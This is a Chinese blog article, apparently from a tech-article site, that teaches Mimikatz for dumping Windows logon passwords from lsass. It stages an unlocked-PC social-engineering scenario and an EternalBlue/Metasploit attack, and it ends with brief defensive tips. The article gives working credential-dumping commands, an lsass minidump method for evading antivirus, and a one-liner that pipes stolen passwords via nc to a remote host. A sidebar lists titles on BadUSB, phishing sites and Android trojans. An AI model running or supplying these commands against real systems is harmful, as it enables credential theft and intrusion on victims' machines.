首页
学习
活动
专区
圈层
工具
发布
37 篇文章
1
7块钱的BadUSB,怎么玩
2
插一个U盘黑一台电脑-Badusb最详细制作教程
3
十块钱RMB | 用Digispark制作一个简单的Badusb
4
用Digispark制作BadUSB+msf植入病毒木马
5
打造属于自己的渗透神器 第二篇
6
社工模拟——利用BadUSB穿透3层内网
7
穿透内网防线,USB自动渗透手法总结
8
【内网渗透】神器Mimikatz的入门简单实践
9
实战渗透 | 情侣空间钓鱼邀请,撸它
10
渗透实战之QQ空间钓鱼网站
11
【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]
12
QQFishing QQ钓鱼站点搭建
13
看我如何定位骗子,找出幕后诈骗的黑手(上)
14
我用Python渗透了一个钓鱼网站的所有信息
15
简单的制作一个钓鱼网页游戏_简单网页制作代码
16
攻破黑市之拿下吃鸡DNF等游戏钓鱼站群
17
CobaltStrike专题 | CobaltStrike实现批量发送钓鱼邮件
18
关于钓鱼网站的原理以及防范方法
19
社会工程学之基础概念、IP获取、IP物理定位、文件属性社会工程学之基础概念、IP获取、IP物理定位、文件属性
20
关于ReelPhish神器的使用
21
七、Selenium与phantomJS----------动态页面模拟点击、网站模拟登录 每天一个小实例1(动态页面模拟点击,并爬取你想搜索的职位信息) 每天一个小实例2(模拟网站登录)我用的是
22
社会工程学 | cobalstrike批量发送钓鱼邮件方法
23
我用Python采集了所有微信好友的头像,发现了一个秘密
24
插入U盘自动攻击:BadUSB原理与实现(含视频)
25
珍惜数据,远离钓鱼
26
钓鱼网站相关数据
27
记一次识别钓鱼网站,所有的盗号都是不经意间
28
如何利用手机木马远程控制
29
如何使用Kali生成木马入侵安卓手机
30
黑客入侵你手机的方法不止两种哦
31
一个黑客的自白书
33
Kali之安卓木马
34
Kali利用Android木马渗透手机(高级篇)
35
记一次无线渗透
36
记一次渗透测试实战
37
你安全吗?丨点击“不明链接”后果是什么你知道吗?
清单首页技术文章详情

【内网渗透】神器Mimikatz的入门简单实践

内网渗透神器Mimikatz的入门简单实践

Mimikatz简介

Mimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码

mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。

代码语言:javascript
复制
主页:https://blog.gentilkiwi.com/mimikatz

假设是一位毫无安全意识的员工,离开电脑未锁屏,他的电脑也属于纯裸奔(啥安全软件也不装)的情况,我们看看这种场景到底有多危险?

一、社工方式+mimikatz获取开机密码

1、设置了开机密码,但无锁屏的习惯

这里模拟攻击者,社工方式(假设借用一下电脑)进行社工

在电脑上下载mimikatz和nc等工具

(图片点击放大查看)

(图片点击放大查看)

(图片点击放大查看)

浏览器下载mimikatz工具后,管理员身份运行命令行,使用mimikatz工具

获取登录密码

代码语言:javascript
复制
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords full

可以看到Password :Windows@2022

(图片点击放大查看)

2、获取到开机密码后,浏览器平时存的账号密码这些是否一览无遗

(图片点击放大查看)

二、利用永恒之蓝漏洞进行攻击获取开机密码

同样假设这台Win7安装完之后未打永恒之蓝安全补丁,也没有装杀毒安全防护软件,只是锁屏

下面为kali机器使用msf攻击框架上传mimikatz获取开机密码的简单过程截图

(图片点击放大查看)

(图片点击放大查看)

(图片点击放大查看)

(图片点击放大查看)

所以打补丁,安装安全防护软件还是非常重要的!

三、防护技巧

1、安装杀毒安全软件,例如火绒,并且设置火绒退出密码

隔离区,信任区也设置安全操作密码

(图片点击放大查看)

(图片点击放大查看)

(图片点击放大查看)

(图片点击放大查看)

(图片点击放大查看)

(图片点击放大查看)

2、最重要也还要当然要养成离开电脑及时锁屏的习惯

不建议使用浏览器自动托管你的密码。

四、mimikatz的其他用法

不上传mimikatz,这样不用解决杀毒软件拦截的问题,直接导出lsass.exe的dump文件

并上传到自己的电脑,本地使用mimikatz进行分析

代码语言:javascript
复制
Mimikatz.exe
sekurlsa::minidump D:\lsass.DMP
sekurlsa::logonpasswords

(图片点击放大查看)

(图片点击放大查看)

(图片点击放大查看)

当然mimikatz的其他用法还有很多,另外很多mimikatz的免杀工具,自行百度科普

代码语言:javascript
复制
导出成文件:mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" >> d:\soft\mimikatz_output.txt
代码语言:javascript
复制
nc方式回传:mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" |  nc -vv 192.168.31.230 4444

五、总结:

人是信息安全意识中最薄弱的环节。安全技术和产品无法保护每一个人远离每一种可能存在的安全风险

如果还在用Win7,赶紧给自己电脑上的杀毒软件配置退出密码吧!

下一篇
举报
领券